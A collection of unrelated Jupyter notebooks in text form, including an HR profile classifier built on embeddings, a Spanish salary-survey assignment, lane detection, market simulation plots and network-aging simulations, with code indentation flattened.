# + [markdown] id="4dP6unj4u5Sh"
# ## 1.3. Downloading Profiles
# + id="QFKiftDVu8SZ"
import json
from tqdm import tqdm
for folder, target_folder in [(data_scientist_parsing_folder, data_scientist_profile_folder), (executive_manager_parsing_folder, executive_manager_profile_folder)]:
file_names = os.listdir(folder)
for file_name in tqdm(file_names):
# Loading Parsing to get Profile Key
file_path = os.path.join(folder, file_name)
with open(file_path, "r") as file:
profile = json.load(file)
response = client.profile.indexing.get(source_key=source_key,
key=profile["key"])
profile = response.get("data")
# Saving Indexed Result
target_path = os.path.join(target_folder, file_name.split(".")[0])
with open(target_path,"w") as file:
json.dump(profile, file)
# + [markdown] id="9McHfesIu948"
# ## 1.4. Computing Embeddings
# + id="1CoGYabIu_wZ"
import base64
import numpy as np
def decode_embedding(base64_string):
output = base64.b64decode(base64_string)
output = np.frombuffer(output, dtype=np.dtype('>f4'))
output = np.reshape(output, (-1, 1024))
return output
# + id="1fkzVghhvqQ1"
import pickle
from tqdm import tqdm
folder = data_scientist_profile_folder
target_folder = data_scientist_embedding_folder
file_names = os.listdir(folder)
for folder, target_folder in [(data_scientist_profile_folder, data_scientist_embedding_folder), (executive_manager_profile_folder, executive_manager_embedding_folder)]:
file_names = os.listdir(folder)
for file_name in tqdm(file_names):
# Loading Profile
file_path = os.path.join(folder, file_name)
with open(file_path, "r") as file:
profile = json.load(file)
response = client.document.embedding.post("profile",
profile,
return_sequences=True)
profile_embedding = decode_embedding(response.get("data"))
# Saving Embedded Result
target_path = os.path.join(target_folder, file_name.split(".")[0])
with open(target_path,"wb") as file:
pickle.dump(profile_embedding, file)
# + [markdown] id="hGT06v1LvBb0"
# ## 1.5. Dataset Generator
# + id="brX1peuMwA9h"
import pickle
import tensorflow as tf
import numpy as np
class Generator(tf.keras.utils.Sequence):
def __init__(self, file_paths, labels, batch_size=2):
self.file_paths = file_paths
self.labels = labels
self.batch_size = batch_size
self.indices = np.arange(len(file_paths))
def __len__(self):
return len(self.file_paths) // self.batch_size
def on_epoch_end(self):
np.random.shuffle(self.indices)
def __getitem__(self, index):
start = index * self.batch_size
end = min(start + self.batch_size, len(self.file_paths))
batch_indices = self.indices[start:end]
batch_path = self.file_paths[batch_indices]
batch_labels = tf.constant(self.labels[batch_indices])
batch_profiles = []
for file_path in batch_path:
with open(file_path, "rb") as file:
profile = pickle.load(file)
batch_profiles.append(profile)
pad_length = max([element.shape[0] for element in batch_profiles])
batch_profiles = [tf.pad(element, [[0, pad_length-element.shape[0]], [0, 0]]) for element in batch_profiles]
batch_profiles = tf.stack(batch_profiles)
return batch_profiles, batch_labels
# + id="U-CPtv6pwClg"
data_scientist_paths = [os.path.join(data_scientist_embedding_folder, file) for file in os.listdir(data_scientist_embedding_folder)]
executive_manager_paths = [os.path.join(executive_manager_embedding_folder, file) for file in os.listdir(executive_manager_embedding_folder)]
file_paths = np.array(data_scientist_paths + executive_manager_paths)
labels = np.array([0] * len(data_scientist_paths) + [1] * len(executive_manager_paths))
# + id="maGFlSBYwDs8"
generator = Generator(file_paths, labels)
x, y = next(iter(generator))
print(x.shape)
# + [markdown] id="YMX9bwWgwFRQ"
# # 2. Machine Learning With HrFlow.ai Embeddings
# + [markdown] id="RK03wDfAwJpN"
# ## 2.1. Profile Classification and Embedding
# + id="LiH5YD8KwGsx"
import tensorflow as tf
from tensorflow.keras.layers import Input, Masking, LSTM, Bidirectional, Dense, Dropout
from tensorflow.keras.models import Model
from tensorflow.keras.losses import SparseCategoricalCrossentropy
# Profile Encoder Deduced From Classification Model Training
model_input = Input(shape=(None, 1024), name="hrflow_embedding")
masking = Masking(name="masking")(model_input)
bi_lstm = Bidirectional(LSTM(8), name="bi_lstm")(masking)
dense = Dense(2, activation="tanh", name="dense")(bi_lstm)
profile_encoder = Model(inputs=[model_input], outputs=[dense], name="profile_encoder")
# Scoring from Encoded Profile
scoring_input = Input(shape=(2,))
dropout = Dropout(0.2, name="dropout")(scoring_input)
softmax = Dense(2, activation='softmax', name="softmax")(dropout)
scoring = Model(inputs=[scoring_input], outputs=[softmax], name="profile_scoring")
# Classification Model
profile_embedding = profile_encoder(model_input)
profile_score = scoring(profile_embedding)
model = Model(inputs=[model_input], outputs=[profile_score])
model.compile(loss=SparseCategoricalCrossentropy(),
optimizer='nadam',
metrics=['accuracy'])
model.summary()
# + [markdown] id="ih2qiDzNwMSZ"
# ## 2.2. Training
# + id="Nw42Mj3TwN39"
model.fit(generator, epochs=5)
# + [markdown] id="LL-VyCl1wQov"
# ## 2.3. Embeddings and Predictions
# + id="_pb6NEv0wZyL"
def line_jump(text, every_char=50):
n_jumps = len(text) // every_char
output = text[:every_char]
for index in range(1, n_jumps):
output += '<br />' + text[every_char*index:every_char*(index+1)]
return output
# + id="atp5-4Y8wacS"
import pickle
import json
from pandas.core.frame import DataFrame
results = {"text": [], "x": [], "y": [], "score": [], "label": [], "prediction": []}
for file_path, label in zip(file_paths, labels):
# Get Profile Label
results["label"].append(label)
# Get Profile Embedding
with open(file_path, "rb") as file:
hrflow_embedding = pickle.load(file)
profile_embedding = profile_encoder.predict(np.expand_dims(hrflow_embedding, axis=0))[0]
x, y = profile_embedding
results["x"].append(x)
results["y"].append(y)
# Get Profile Prediction
profile_score = model.predict(np.expand_dims(hrflow_embedding, axis=0))[0]
results["score"].append(profile_score[1])
results["prediction"].append(int(profile_score[1]>0.5))
# Get Profile Summary
path = file_path.split("/")
path[-3] = "profile"
with open("/".join(path), "r") as file:
summary = json.load(file)["info"]["summary"]
results["text"].append(line_jump(summary))
df = DataFrame(results)
df
# + id="HdNbalRMwfsg"
import numpy as np
import plotly.graph_objects as go
import plotly.express as px
# Compute Scores for Mesh Values
xx = np.arange(-1, 1.1, 0.1)
yy = np.arange(-1, 1.1, 0.1)
mesh_values = np.array([scoring.predict(np.array([[x, y] for x in xx]))[:,1] for y in yy])
# Contour/Boundary Plot
data = go.Contour(x=xx, y=yy, z=mesh_values,
colorscale=[[0.0, "rgb(165,0,38)"],
[0.1111111111111111, "rgb(215,48,39)"],
[0.2222222222222222, "rgb(244,109,67)"],
[0.3333333333333333, "rgb(253,174,97)"],
[0.4444444444444444, "rgb(254,224,144)"],
[0.5555555555555556, "rgb(224,243,248)"],
[0.6666666666666666, "rgb(171,217,233)"],
[0.7777777777777778, "rgb(116,173,209)"],
[0.8888888888888888, "rgb(69,117,180)"],
[1.0, "rgb(49,54,149)"]])
layout = {'width': 600, 'height': 600,
'xaxis_title': 'x', 'yaxis_title': 'y',
'xaxis': {'range': [-1, 1]}, 'yaxis': {'range': [-1, 1]},
'title': 'Decision Boundaries (Executive Managers in Yellow, Data Scientists in Blue)'}
fig = go.Figure(data = data, layout=layout)
# Profiles Embeddings
scatter = px.scatter(df, x='x', y='y',
hover_data=['summary', 'score', 'label', 'prediction'],
color='prediction')
fig.add_trace(scatter.data[0])
# Show Graph
fig.show()
|
examples/colab/build_personalized_ai_hr_models.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/DiploDatos/AnalisisyVisualizacion/blob/master/Entregable_Parte_1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="LYvAOR2VzHmW"
#
# **Diplomatura en Ciencia de Datos, Aprendizaje Automático y sus Aplicaciones**
#
# **Edición 2021**
#
# ---
# ## Trabajo práctico entregable - Parte 1
# + id="Xwdfo7z20TUK"
import io
import matplotlib
import matplotlib.pyplot as plt
import numpy
import pandas as pd
import seaborn
seaborn.set_context('talk')
# + id="Xwdfo7z20TUK"
# -
nuevas
# + [markdown] id="XY2Hl-Ma07Nn"
# ## Lectura del dataset
#
# En la notebook 00 se explican los detalles de la siguiente sección.
# -
# + id="Vviv_sqXdR5W"
url = 'https://cs.famaf.unc.edu.ar/~mteruel/datasets/diplodatos/sysarmy_survey_2020_processed.csv'
df = pd.read_csv(url)
# + colab={"base_uri": "https://localhost:8080/", "height": 297} id="gckNHXXLktJ4" outputId="66c64637-de04-4239-a158-ce88d604511d"
df[:3]
# + [markdown] id="-ZSQYANFHHgV"
# # Ejercicio 1 - Análisis descriptivo
#
# Responder a la pregunta: **¿Cuáles son los lenguajes de programación asociados a los mejores salarios?**
#
# Para ello:
# 1. Seleccionar las columnas relevantes para analizar.
# 2. Seleccionar las filas relevantes para analizar. Esto incluye la eliminación de valores extremos y erróneos, pero también puede enfocar el análisis en una sub-población. Por ejemplo, se pueden limitar a personas con un salario mayor que 10000 pesos, o a las personas que trabajan sólo en "Data Science", pero deben justificar su elección y reformular la pregunta inicial de ser necesario.
# * Obtener una lista de los lenguajes de programación más populares. Decidir cuántos y cuáles seleccionan para incluir en el análisis.
# * Para cada una de las otras columnas del punto anterior, elegir los rangos o valores seleccionan para incluir en el análisis.
# 3. Seleccionar métricas que ayuden a responder la pregunta, y los métodos para analizarlas. Elegir UNA de las siguientes opciones:
# * Comparar las distribuciones de salario para cada lenguaje utilizando visualizaciones. Como la visualización es el producto final, debe ser clara y mostrar información relevante.
# * Comparar medidas de estadística descriptiva sobre la distribución de salario para cada lenguaje. Sean creativos, la estadística descriptiva nos permite decir cosas como: "el 10% de los mejores sueldos los ganan, en su mayoría, programadores que saben kotlin!" (donde *mayoría* es un término medio engañoso que sólo significa más del 50%). Para comparar múltiples lenguajes, les recomendamos usar también visualizaciones.
# * Comparar probabilidades. Por ejemplo: "Si sabés Python o Java, tenés un 30% más de chances de ganar arriba de 100K".
#
# Si lo consideran necesario, realicen varias iteraciones. Es decir, si encuentran que las distribuciones de los lenguajes de programación que seleccionaron inicialmente no son muy diferentes, pueden re-hacer el análisis usando sólo los lenguajes de programación que son diferentes.
# -
# + id="6dqTEr7cZgvl"
# complete here if you want to include more columns
relevant_columns = ['tools_programming_languages', 'salary_monthly_NETO']
# + [markdown] id="OoGgzMvuEocM"
# ### Conteo de frecuencias de los lenguajes de programación
#
# La columna que contiene información sobre los lenguajes de programación utilizados es `tools_programming_languages`. Sus valores son strings con los lenguajes seleccionados separados por comas.
#
#
# + colab={"base_uri": "https://localhost:8080/"} id="J7AB2Ty8SvNl" outputId="cb0ee28d-5c7f-4ed5-cf32-f4fddce64eb7"
df.tools_programming_languages[:3]
# + [markdown] id="l8bYmvMhSroH"
# Las siguientes celdas de código separan estos lenguajes de programación y cuentan la frecuencia con la que aparecen.
#
# No es necesario entender este código en profundidad, aunque sí es un buen ejercicio.
# + colab={"base_uri": "https://localhost:8080/", "height": 223} id="PAQ81x3iUP_N" outputId="690186ea-5c29-4fb8-b06c-2ff8c3de7c71"
# Convert the comma-separated string of languages to a list of string.
# Remove 'ninguno de los anteriores' option, spaces and training commas.
def split_languages(languages_str):
if not isinstance(languages_str, str):
return []
# Remove 'other' option
languages_str = languages_str.lower()\
.replace('ninguno de los anteriores', '')
# Split string into list of items
# Remove spaces and commas for each item
return [lang.strip().replace(',', '')
for lang in languages_str.split()]
# Create a new column with the list of languages
df.loc[:, 'cured_programming_languages'] = df.tools_programming_languages\
.apply(split_languages)
if 'cured_programming_languages' not in relevant_columns:
relevant_columns.append('cured_programming_languages')
# Duplicate each row of df for each programming language
# mentioned in the response.
# We only include in df_lang the columns we are going to analyze later, so we
# don't duplicate innecesary information.
df_lang = df.cured_programming_languages\
.apply(pd.Series).stack()\
.reset_index(level=-1, drop=True).to_frame()\
.join(df[relevant_columns])\
.rename(columns={0: 'programming_language'})
# Horrible programming style! But a lot of data science code can be written with
# as concatenations of functions (pipelines), and there's no elegant way of
# doing that on Python.
df_lang[:5]
# + [markdown] id="qm8NUg-7UEue"
# En la columna `programming_language` se encuentra cada lenguaje por separado. Notar que si una respuesta contenía 3 lenguajes, como `"HTML, Javascript, Python"`, la fila ha sido replicada 3 veces. Por ello, hay tres filas con índice 1.
# + colab={"base_uri": "https://localhost:8080/", "height": 357} id="lNPb4tTvWCwv" outputId="02efa4bd-7d00-49c1-efee-d5d68f3eaf9f"
language_count = df_lang.programming_language.value_counts()\
.reset_index()\
.rename(columns={'index': 'language', 'programming_language': 'frequency'})
language_count[:10]
# + [markdown] id="nThbJ1KeUgDo"
# ## Filtrado de lenguajes relevantes
#
# El siguiente código permite seleccionar sólo las filas donde el valor de la columna `programming_language` se encuentre en la lista `interesting_languages`.
# + colab={"base_uri": "https://localhost:8080/", "height": 223} id="DEpVptnLZUQU" outputId="dc2bdb53-1fe2-4f1d-b5ba-42a53efe6d4c"
# Filter out languages that we want to exclude
# Complete here with your selected list.
interesting_languages = ["Python"]
filtered_df_lang = df_lang[df_lang.programming_language.isin(interesting_languages)]
filtered_df_lang[:5]
# + [markdown] id="tWo8SmmC9FAk"
# # Ejercicio 2 - Densidades y varias varialbes
#
# Responder a la pregunta general: **¿Que herramientas (prácticas y teóricas) són útiles para explorar la base, descubrir patrones, asociaciones?**
#
# Para ello considere (igual al ejercicio Anterior):
# 1. Seleccionar las columnas relevantes para analizar.
# 2. Seleccionar las filas relevantes para analizar. Esto incluye la eliminación de valores extremos y erróneos, pero también puede enfocar el análisis en sub-poblaciones.
# + [markdown] id="5baYhH0XHM3S"
# ## a) Densidad conjunta
#
# Que herramientas visuales y modelos puede utilizar para estudiar la distribución y comportamiento de sus datos?
#
# Elija tres variables numéricas y 2 variables categóricas. Visualice la base según varias de las variables elegidas. Puede describir de alguna forma el comportamiento de sus datos? Que herramientas utilizaría? Describa
#
#
#
# + [markdown] id="lkuHE2aZGHMO"
# ## b) Asociación
#
# * Necesitamos decidir si sacar o no la columna de salario bruto. Para hacer la encuesta más simple.
# ¿Existe una correlación entre el salario bruto y el neto? Que abordaje y medidas usaría
#
#
# + [markdown] id="7MZrbRJCm-ae"
# ## c) Densidad condicional
#
# Estudie la distribución del salario según el nivel de estudio.
#
# Separe la población según el nivel de estudio (elija dos subpoblaciones numerosas) y grafique de manera comparativa ambos histogramas de la variable `'salary_monthly_NETO'`
# ¿Considera que ambas variables son independientes?
# ¿Qué analizaría al respecto?
#
# Calcule medidas de centralización y dispersión para cada subpoblación
#
#
#
#
#
# + [markdown] id="u8wgYxNiqVpE"
# ## d) Densidad Conjunta condicional
#
# Elija dos variables numéricas y una categórica.
# Estudie la dispersión (scatterplot) de las dos variables discriminando en color por la variable categórica (ayuda: hue en seaborn)
#
|
Entregable_Parte_1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
# ### Zhiqi: I renamed your file to zhiqi.tif:
# !ls imagery/zhiqi -l
# !gdalinfo -stats imagery/zhiqi/zhiqi.tif
# ### Here is an RGB plot of bands 3,4,5:
# %run scripts/dispms -f imagery/zhiqi/zhiqi.tif -e 2 -p [3,4,5]
# ### The emnew.py code adds gaussian noise to the zero-valued edge pixels. They cause the algorithm interpret the edge pixels as a compact cluster:
# %run scripts/em -K 4 -M 2 -n 0 imagery/zhiqi/5bands-fullarea.tif
# %run scripts/dispms -f imagery/zhiqi/zhiqi_em.tif -c
# %run scripts/em -h
|
src/zhiqi.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Advanced Lane Finding Project
#
# The goals / steps of this project are the following:
#
# * Compute the camera calibration matrix and distortion coefficients given a set of chessboard images.
# * Apply a distortion correction to raw images.
# * Use color transforms, gradients, etc., to create a thresholded binary image.
# * Apply a perspective transform to rectify binary image ("birds-eye view").
# * Detect lane pixels and fit to find the lane boundary.
# * Determine the curvature of the lane and vehicle position with respect to center.
# * Warp the detected lane boundaries back onto the original image.
# * Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.
#
# [//]: # (Image References)
#
# [image1]: ./output_images/undistortedImage.jpg "Undistorted"
# [image2]: ./test_images/test1.jpg "Road Transformed"
# [image3]: ./output_images/binaryThreshold_test1.png "Binary Example"
# [image4]: ./output_images/binaryThreshold_test1_warped.jpg "Warp Example"
# [image5]: ./output_images/drawn_lines.jpg "Fit Visual"
# [image6]: ./output_images/test5.jpg "Output"
# [video1]: ./output_images/project_video.mp4 "Video"
#
# ## [Rubric](https://review.udacity.com/#!/rubrics/571/view) Points
#
# ### Here I will consider the rubric points individually and describe how I addressed each point in my implementation.
#
#
# ### Camera Calibration
#
# #### 1. Briefly state how you computed the camera matrix and distortion coefficients. Provide an example of a distortion corrected calibration image.
#
# The code for this can be found in advanced_lane_lines.ipynb. The class "PreprocessImage" provides helper functions to calibrate the camera and undistort the image. The user of the class has to first populate the objpoints using the call "populate_calibration_points". Once all the obj points are generated, "calibrate_camera" has to be called to generate the calibration matrix. Finally, the member function call "undistort_image" is used to undistort Images. The below Image is an example for preprocessed iamge.
#
# ![alt text][image1]
#
# ### Pipeline (single images)
#
# #### 1. Provide an example of a distortion-corrected image.
#
# To demonstrate this step, I will describe how I apply the distortion correction to one of the test images like this one:
# ![alt text][image2]
#
# #### 2. Describe how (and identify where in your code) you used color transforms, gradients or other methods to create a thresholded binary image. Provide an example of a binary image result.
#
# I used a combination of color and gradient thresholds to generate a binary image (function binary_threshold in `advanced_lane_lines.ipynb`). Here's an example of my output for this step.
#
# ![alt text][image3]
#
# #### 3. Describe how (and identify where in your code) you performed a perspective transform and provide an example of a transformed image.
#
# The code for perspective transformed is defined in WarpImage. Member function `create_warped` is used to create warped image and `create_unwarped` to unwarp and image. I chose the hardcode the source and destination points in the following manner:
#
# ```python
# src = np.float32([[552,462], [760,462] , [1350,668],[140,668]])
#
#
# dst = np.float32([[offset, offset], [img_size[0]-offset, offset],
# [img_size[0]-offset, img_size[1]-offset],
# [offset, img_size[1]-offset]])
# ```
#
# This resulted in the following source and destination points:
#
# | Source | Destination |
# |:-------------:|:-------------:|
# | 552, 462 | 100, 100 |
# | 760, 462 | 1180, 100 |
# | 1350, 668 | 1180, 710 |
# | 140, 668 | 100, 710 |
#
# I verified that my perspective transform was working as expected by drawing the `src` and `dst` points onto a test image and its warped counterpart to verify that the lines appear parallel in the warped image.
#
# ![alt text][image4]
#
# #### 4. Describe how (and identify where in your code) you identified lane-line pixels and fit their positions with a polynomial?
#
# I have used sliding window method to find the lane-line pixels
#
# ![alt text][image5]
#
# #### 5. Describe how (and identify where in your code) you calculated the radius of curvature of the lane and the position of the vehicle with respect to center.
#
# I calculated the curvature using the function call `calcCurvature`.
#
# #### 6. Provide an example image of your result plotted back down onto the road such that the lane area is identified clearly.
#
# The class `DemaracteLanes` wraps and abstracts all preprocessing of an image. The image below shows a sample image with lanes drawn:
#
# ![alt text][image6]
#
# ---
#
# ### Pipeline (video)
#
# #### 1. Provide a link to your final video output. Your pipeline should perform reasonably well on the entire project video (wobbly lines are ok but no catastrophic failures that would cause the car to drive off the road!).
#
# Here's a [link to my video result](./project_video.mp4)
#
# ---
#
# ### Discussion
#
# #### 1. Briefly discuss any problems / issues you faced in your implementation of this project. Where will your pipeline likely fail? What could you do to make it more robust?
#
# I have used sliding window method to identify the lanes. Initially, I faced an issue when the lane lines overflown the area of intereset. I am listing down few of the areas where the implementation has shortcoming.
# * Radius of curvature of 2 lanes do not match
# * If the lanes near the base of the image has broken lines, algorithm finds it difficut to correct the starting position
# * The lanes in frames of the video are not smooth.
#
|
Untitled.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import matplotlib.pyplot as plt
from matplotlib import rc
rc('text', usetex=False)
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['CMU Sans Serif']
rcParams['figure.dpi'] = 300
rcParams['savefig.dpi'] = 1200
plt.ion()
import pandas as pd
import numpy as np
# %matplotlib inline
import ternary
import math
import glob
import re
rcParams['figure.figsize'] = 14,4
def USD(x): return x
# +
s = "../cmake-build-release/output/volatility_illustration"
s = "../cmake-build-release/output/experiment_2_statistics"
P = []
with open(s +'/prices.txt', 'r') as content_file:
for l in content_file.readlines():
P.append(float(l.split('USD(')[1].split(')')[0]))
offset_prices = 0
prices = np.array(P)[offset_prices:-1]
volatility = np.std(np.log( prices.flatten()[1:]
/ prices.flatten()[:-1])
) / (np.sqrt(1/252))
D = []
with open(s +'/0_dividend.txt', 'r') as content_file:
for l in content_file.readlines():
D.append(float(l.split(',')[1].split(')')[0]))
dividends = np.array(D)[offset_prices::2]
# -
end = 1
plt.plot(100*dividends[:1*25200][offset_prices//2:] /dividends[0], label='fundamental')
plt.plot(100*prices[:1*25200] /prices[0], label='prices')
plt.xlim([0, min(len(prices), len(dividends))])
#plt.yscale('log')
plt.legend()
plt.acorr(np.diff(np.log(prices[252:])),maxlags=252)
plt.xlim([0,None])
plt.ylim([-0.3,0.3])
plt.xlabel("lag")
plt.ylabel("correlation coefficient")
plt.acorr(np.diff(np.log(dividends[252:])),maxlags=252)
plt.xlim([0,None])
plt.ylim([-0.3,0.3])
plt.xlabel("lag")
plt.ylabel("correlation coefficient")
R = prices[10*252:100*252]
std = (np.exp(np.std(np.diff(np.log(R))))-1)*np.sqrt(252)
mu = (np.exp(np.mean(np.diff(np.log(R)))))**(252)-1
(mu-0.02)/std, mu, std
X = []
for i in range(1, len(prices[9*252:])):
X.append((prices[i]/prices[i-1]) + (dividends[i]/252)/prices[i-1] - 1)
(np.mean(X)+1)**252-1
# +
X = 1.
P = 1
D = 0.01/252
for t in range(252):
X *= (P*(1.02**(1/252))/P)
X += D*(X/P)
D = D*(1.02**(1/252))
P = P*(1.02**(1/252))
# -
X
def readsignal(fund):
P = []
with open(s +f'/_{fund}__signal.txt', 'r') as content_file:
for l in content_file.readlines():
P.append(float(l.split(',')[1].split(')')[0]))
prices = np.array(P)
return prices
plt.plot(readsignal(4))
# # Plot investment signal
plt.acorr(np.diff(np.log(dividends)), maxlags = 20)
plt.xlim([0,None])
plt.acorr(np.diff(np.log(prices)), maxlags = 20)
plt.xlim([0,None])
def readnet_asset_value(fund):
P = []
with open(s +f'/_{fund}__net_asset_value.txt', 'r') as content_file:
for l in content_file.readlines():
P.append(float(l.split('USD(')[1].split(')')[0]))
prices = np.array(P)
offset_prices = 252
volatility = np.std(np.log( prices.copy().flatten()[offset_prices:][1:]
/ prices.copy().flatten()[offset_prices:][:-1])
) / (np.sqrt(1/252))
return prices
def readpnl(fund):
P = []
with open(s +f'/_{fund}__pnl.txt', 'r') as content_file:
for l in content_file.readlines():
P.append(float(l.split('USD(')[1].split(')')[0]))
prices = np.array(P)
return prices
# +
start=252*0
stop = start+2*25_200
concentrations = [0.378, 0.297, 0.225, 0.100]
NAV2 = concentrations[0] * 200_000_000 + 10 * readpnl(2)[start:stop].cumsum()
NAV3 = concentrations[1] * 200_000_000 + 10 * readpnl(3)[start:stop].cumsum()
NAV4 = concentrations[2] * 200_000_000 + 10 * readpnl(4)[start:stop].cumsum()
#NAV5 = concentrations[3] * 200_000_000 + 10 * readpnl(5)[start:stop].cumsum()
stop = min(stop-start, len(NAV2), len(NAV3), len(NAV4))
NAV2 = concentrations[0] * 200_000_000 + 10 * readpnl(2)[start:stop].cumsum()
NAV3 = concentrations[1] * 200_000_000 + 10 * readpnl(3)[start:stop].cumsum()
NAV4 = concentrations[2] * 200_000_000 + 10 * readpnl(4)[start:stop].cumsum()
#NAV5 = concentrations[3] * 200_000_000 + 10 * readpnl(5)[start:stop].cumsum()
plt.plot(NAV2/NAV2[0], label="noise trader")
plt.plot(NAV3/NAV3[0], label="value investor")
plt.plot(NAV4/NAV4[0], label="trend follower")
#plt.plot(NAV5/NAV5[0], label="Kelly bettor")
plt.ylabel("wealth (multiplier)")
plt.xlabel("time")
plt.title("wealth relative to endowment")
plt.legend()
# -
|
analysis/Market Prices and Net Asset Value.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# # Network Topology
#
# This notebook contains code for constructing, visualizing, and controlling aging in Erdos-Renyi random networks and Barabasi-Albert scale-free networks. The main network used in the paper was the Gilbert random network and the corresponding figures for it can be found in the notebooks: 'model_visualization.ipynb' and 'nonlinear_control.ipynb'. The code here corresponds to Figure S6 in the supplementary material for the paper.
from model import *
from ode_solver import *
# ## Erdos-Renyi G(N,m) random network
#
# ### Figure S4a: Vitality $\phi(t)$ as a function of time in an interdependent network compared to the linear theory
simPopulation('ERfinal', pop_size=50, N=1000, p=0.1, d=0, f=0.025, r=0, f_thresh=0.01,
graph_type='ERrandom_s', weight_type='uniform', check_type='none', kinetic=1, P_check=1, e=0, cost_type=['healthspan_quadratic', 8000],
costC=0.1, costR=1, costE=0.5, costD=0.5, costL=1, P_repl=0, costrepl=1, max_repl=1, repl_type='constant',
node_type='binary', damage_type='uniform', edge_type='binary', f_edge=0, r_edge=0, std=0.3,
P_ablate=0,costablate=1,ablate_type='constant',repair_start=0,repair_end=100,delay=0,time_end=100,dependency=0.5,save='yes',write_inds='yes')
# +
f=0.025
r=0
alpha=10
phi0 = 1
I_list = [0.5]
n = round(0.1*(999))
t = np.linspace(0, 100, 101)
simulated_vits = []
for fn in os.listdir('./Data/'):
if 'ERfinal' in fn:
if 'MEAN' in fn:
mean_vit = np.genfromtxt('./Data/'+fn,delimiter=',')
else:
simulated_vits.append(np.genfromtxt('./Data/'+fn,delimiter=',')[0,:])
for i, vit in enumerate(simulated_vits):
if i == 0:
plt.plot(np.arange(0,len(vit),1), vit, color='0.5', alpha=0.1)#, label='Simulated')
else:
plt.plot(np.arange(0,len(vit),1), vit, color='0.5', alpha=0.1)
plt.plot(np.arange(0,len(mean_vit[0,:]),1), mean_vit[0,:],linewidth=2.5,color='0.5',label='Simulated')
# Plot
r=0
vitality_theory = [(np.exp((-f-r)*(time-1))*(f+np.exp((f+r)*(time-1))*r))/(f+r) for time in t]
plt.plot([time-1 for time in t], vitality_theory, color='m', linestyle='--', alpha=0.5, linewidth=2.0, label='Linear Theory')
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.xlabel("Time, $t$", fontsize=16)
plt.ylabel("Vitality, $\phi$", fontsize=16)
plt.ylim([-0.05,1.05])
plt.xlim([-0.05, 30])
plt.legend(loc='lower left',fontsize=14)
plt.tight_layout()
filename = 'ERfinal'
plt.savefig('Figures/'+filename+'_vitality', dpi=800)
plt.show()
# -
# ### Figure S4d: Nonlinear optimal control for different costs of repair $\alpha$
# +
from scipy.signal import savgol_filter
colors = ['#000080', '#FFA500', 'm', 'k', '#FFC0CB']
markers = ['o', '^', 's', 'D', '*']
transparencies = [0.6, 0.6, 0.4, 0.5, 1.0]
filelist2=['Erdos_Renyi/0.1/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist3=['Erdos_Renyi/0.15/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist1=['Erdos_Renyi/0/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist5=['Erdos_Renyi/0.05/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
f = 0.025
alpha=10
T = 100
parameter_list = np.arange(0,20,0.4)
def bin_data (x, y, n):
'''
x = array of x-value lists
y = array of y-value lists
n = number of points that each binned average will contain
'''
k = 0
new_x = []
new_y = []
running_avg_x = 0
running_avg_y = 0
while k < len(x):
if k%n == 0 and k>0:
new_x.append(running_avg_x)
new_y.append(running_avg_y)
running_avg_x = 0
running_avg_y = 0
running_avg_x += x[k]/n
running_avg_y += y[k]/n
k+= 1
return (new_x, new_y)
#plt.figure(figsize=(6,3))
plt.figure()
for n, filename in enumerate(filelist3):
# open and read file data
input_file_path = './Nonlinear/' + filename + '.csv'
with open(input_file_path, 'rt') as tsvin:
tsvin = csv.reader(tsvin, delimiter=',')
row_list = list(tsvin)
T1_list = [float(i) for i in row_list[1]]
T2_list = [float(i) for i in row_list[2]]
# Select the T curve to fit over
#T_list_f = T2_list
T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
plt.scatter(T1_list, new_prm_list, color=colors[3], marker=markers[3], alpha=transparencies[3], s=30, edgecolors='none', label='$I=0.15$') # 0.15
T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
plt.scatter(T2_list, new_prm_list, color=colors[3], marker=markers[3], alpha=transparencies[3], s=30, edgecolors='none')#, label='$I=0.15$') # 0.15
for n, filename in enumerate(filelist2):
# open and read file data
input_file_path = './Nonlinear/' + filename + '.csv'
with open(input_file_path, 'rt') as tsvin:
tsvin = csv.reader(tsvin, delimiter=',')
row_list = list(tsvin)
T1_list = [float(i) for i in row_list[1]]
T2_list = [float(i) for i in row_list[2]]
# Select the T curve to fit over
#T_list_e = T2_list
T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
plt.scatter(T1_list, new_prm_list, color=colors[2], marker=markers[2], alpha=transparencies[2], s=30, edgecolors='none', label='$I=0.10$') # 0.1
T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
plt.scatter(T2_list, new_prm_list, color=colors[2], marker=markers[2], alpha=transparencies[2], s=30, edgecolors='none')#, label='$I=0.10$') # 0.1
for n, filename in enumerate(filelist5):
# open and read file data
input_file_path = './Nonlinear/' + filename + '.csv'
with open(input_file_path, 'rt') as tsvin:
